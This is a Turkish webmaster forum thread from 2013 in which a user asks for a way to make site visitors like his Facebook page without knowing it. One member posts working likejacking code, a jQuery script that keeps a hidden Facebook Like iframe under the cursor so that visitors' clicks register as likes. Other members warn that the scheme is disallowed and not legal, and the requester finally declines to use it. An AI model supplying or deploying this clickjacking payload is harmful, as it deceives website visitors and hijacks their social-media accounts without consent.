Forum'da ara:
Ara

Yazar Mesaj
Mesaj17.05.2013, 05:52 (UTC)    
Mesaj konusu: Facebook Sayfasını Gizlice Beğendirme (Yeni)

Kolay gelsin Smile

Ben sitemin her hangi bir yerine resim veya yazı nın arkasına facebook sayfasını beğendir eklentisi istiyorum..

yani bir kişi resime tıkladığı zaman haberi olmadan o resime veya yazıya tıklayınca benım siteye ait olan facebook sayfamı beğenmiş olacak (Daha önce bu konuyu açtım yasak diyen mod arkadaşlar çıktı bu tamamen yasaldır konuyu kapatmayın)

Bizzat kendim e-mail attım:
http://l1305.hizliresim.com/19/k/n4nsl.bmp
Mesaj17.05.2013, 13:46 (UTC)    
Mesaj konusu:

facebook sayfan 1 haftaya banlanır face yemıyo bu numarayı bide kullanışlı değil Very Happy arıca tr.ggli sitelerde begenmek istediginize eminmisiniz anlamında kutu cıkıyo tam içerigini yazamam ama işin cok zor Very Happy
Mesaj17.05.2013, 14:56 (UTC)    
Mesaj konusu:

@osmanlisultanlar yasak diyerekten başlığını kilitlemişti.
İyiki sana bu işin peşine düş demişim.
Çünkü Siteniz Hangi Durumlarda Silinir başlığında bu ibare yok, moderatör neye göre bu yargıyı bildirip başlığını kilitlemişti anlamamıştım. Rolling Eyes

İnşallah aradığın kodu bulursun.
Mesaj17.05.2013, 15:00 (UTC)    
Mesaj konusu:

ruya-anlamlari yazmış:
facebook sayfan 1 haftaya banlanır face yemıyo bu numarayı bide kullanışlı değil Very Happy arıca tr.ggli sitelerde begenmek istediginize eminmisiniz anlamında kutu cıkıyo tam içerigini yazamam ama işin cok zor Very Happy

facebook hiç bir şekilde bilmiyor şuanda bile facebook sayfası açıkken herhangi bi sitede dolanırken bir kaç sayfa beğeniyoruz..

Öyle ki facebook benım şahsi siteme karışamaz bir kişi benim siteme girip dolaşıyorsa bu her şeyi kabullenmiş anlamına gelir.facebook niye siliyo sayfayı anlamadım Confused
Mesaj17.05.2013, 15:02 (UTC)    
Mesaj konusu:

balikesirerdek yazmış:
Çünkü Siteniz Hangi Durumlarda Silinir başlığında bu ibare yok, moderatör neye göre bu yargıyı bildirip başlığını kilitlemişti anlamamıştım. Rolling Eyes

dostum benım derdim mod.larla değil.. bilmeyerek bi şeyi söylemesi yanlış olsada aklında yatan bi seyler vardır..ama site konusu halloldu bu sefer facebook sayfası kapanır diyolar.. facebook destek hakkıylada mı konuşsam ne Razz Very Happy
Mesaj17.05.2013, 15:12 (UTC)    
Mesaj konusu:

dunyagerceklerim yazmış:
balikesirerdek yazmış:

dostum benım derdim mod.larla değil.. bilmeyerek bi şeyi söylemesi yanlış olsada aklında yatan bi seyler vardır..ama site konusu halloldu bu sefer facebook sayfası kapanır diyolar.. facebook destek hakkıylada mı konuşsam ne Razz Very Happy

Sayfan kapatılana kadar ohooo, sen linki kaldırmış bile olursun.
Ayrıca osmanlisultanlarla da hiçbir derdim yok, bir dahakine temkinli olmasında fayda var, onu belirttim. Rolling Eyes
Mesaj17.05.2013, 15:16 (UTC)    
Mesaj konusu:

Sorun yok . Şimdi kodu bulmaya geldi ama baya biz zor olacak benım için Smile ona profesyonel biri lazım anlayan:)
Mesaj17.05.2013, 22:36 (UTC)    
Mesaj konusu:

öyle bir sisem var fakat BS nin böyle birşeye izin vereceğini sanmıyorum.
Bu konu hakkında tambir bilgim yok .

pop-up reklamından farkı yok hatta daha da zorla " Tıklatma" ya giriyor. BS böyle şeyleri sevmiyor. ben 2007 den beri BS deyim, bana sorarsan emeklerin boşa gider :/

BS adminleri konu hakkında bilgileri var ise ve yasak ise konuyu silerler bizde böylece yasak olduğunu anlar ve bir daha böyle bir başlık açmayız Smile

ama yinede seni kırmayacağım kodu paylaşacağım belki dediğin gibi facebook izni vardır Smile

Kod:

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.js"></script>                <script type="text/javascript">
$(document).mousemove(function(e){
$("#canafar").css({
         'top' : e.pageY-2,
         'left': e.pageX-2
                 });
});
window.setTimeout(function() {
$("#canafar").css({
         'z-index' : '-1'
                 });
}, 5000)
</script>  <iframe src="http://www.facebook.com/plugins/like.php?href=Facebok Sayfa URL'si Buraya Gelecek&show_faces=false&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; position:fixed; width:60px; height:30px; z-index:1;" id="canafar"></iframe>

Facebok Sayfa URL'si Buraya Gelecek bunu sil fakat fazladan silme sadece kırmızıyla gösterdiğim yeri sil Smile yerine facebook adresini yaz .
Mesaj17.05.2013, 22:38 (UTC)    
Mesaj konusu:

ayrıca bu kodu ekledikten sonra eğer sitene giren kişi başka bir sekmede facebook açmamışsa , tık başına facebook giriş sayfası çıkacaktır ve bu çok sinir bozucu yani ziyaretcilerini kaybedebilirsin Smile
Mesaj18.05.2013, 05:48 (UTC)    
Mesaj konusu:

Galiba @osmanlisultanlar modumun dediği gibi,bu işlem yasal değil.
Çünki,site ziyaretçılerine mecburen bir şey yapılması,ki buna Facebook sayfa beğendirme de ait,yasal olarak doğru değildir.
Mesaj18.05.2013, 06:26 (UTC)    
Mesaj konusu:

search-networks yazmış:
Çünki,site ziyaretçılerine mecburen bir şey yapılması,ki buna Facebook sayfa beğendirme de ait,yasal olarak doğru değildir.

bende öyle düşündüm yasal gibi gelmedi
Mesaj18.05.2013, 12:52 (UTC)    
Mesaj konusu:

skorbizde yazmış:
search-networks yazmış:

bende öyle düşündüm yasal gibi gelmedi

hani ben e -mail attım sıkıntı yok dese bile ben ileride sorun çıkacağını düşünüyorum yinede kodu koymuyacam çok teşekkürler
Önceki mesajları göster: